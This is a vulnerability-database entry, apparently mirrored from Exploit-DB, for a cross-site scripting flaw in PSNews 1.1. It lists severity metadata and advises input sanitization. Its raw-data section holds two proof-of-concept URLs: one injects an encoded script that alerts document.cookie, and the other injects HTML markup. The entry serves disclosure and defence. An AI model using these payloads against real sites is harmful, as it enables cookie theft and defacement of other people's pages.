header-logo
Suggest Exploit
vendor:
PSNews
by:
Unknown
5.5
CVSS
MEDIUM
Cross-Site Scripting
79
CWE
Product Name: PSNews
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: Unknown
CPE: a:psnews_project:psnews:1.1
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

PSNews Cross-Site Scripting Vulnerability

PSNews is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize user-supplied input before using it in the application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11124/info

PSNews is a Web application that is implemented in PHP.

PSNews is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.

This vulnerability is reported to exist in version 1.1 of PSNews.

http://www.example.com/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>
http://www.example.com/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>

Navigation

Suggest Exploit

Services By CQR